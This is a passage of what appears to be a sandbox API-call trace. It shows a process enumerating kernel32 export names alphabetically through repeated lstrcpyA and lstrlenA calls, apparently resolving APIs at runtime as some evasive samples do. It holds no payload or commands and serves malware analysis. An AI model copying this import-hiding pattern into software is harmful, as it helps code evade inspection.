lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.046] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.046] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.046] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.046] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.046] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.046] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.046] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.046] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.046] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.046] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.047] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.047] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.047] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.047] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.047] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.047] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.047] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.047] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.047] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.047] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.047] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.047] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.047] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.047] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.047] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.047] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.047] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.047] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.047] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.048] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.048] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.048] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.048] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.048] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.048] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.048] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.048] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.048] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.048] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.048] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.048] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.048] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.048] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.048] lstrlenA (lpString="BEEP") returned 4 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.048] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.048] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.048] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.048] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.049] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.049] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.049] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.049] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.049] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.049] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.049] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.049] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.049] lstrlenA (lpString="CANCELIO") returned 8 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.049] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.049] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.049] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.049] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.049] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.049] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.049] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.049] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.049] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.049] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.049] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.050] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.050] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.050] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.050] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.050] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.050] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.050] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.050] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.050] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.050] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.050] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.050] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.050] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.050] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.050] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.050] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.050] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.050] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.050] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.051] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.051] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.051] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.051] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.051] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.051] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.051] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.051] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.051] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.051] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.051] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.051] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.051] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.052] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.052] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.052] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.052] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.052] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.052] lstrlenA (lpString="COPYFILEA") returned 9 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.052] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.052] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.052] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.052] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.052] lstrlenA (lpString="COPYFILEW") returned 9 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.052] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.052] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.052] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.052] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.052] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.052] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.052] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.052] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.053] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.053] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.053] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.053] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.053] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.053] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.053] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.053] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.053] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.053] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.053] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") 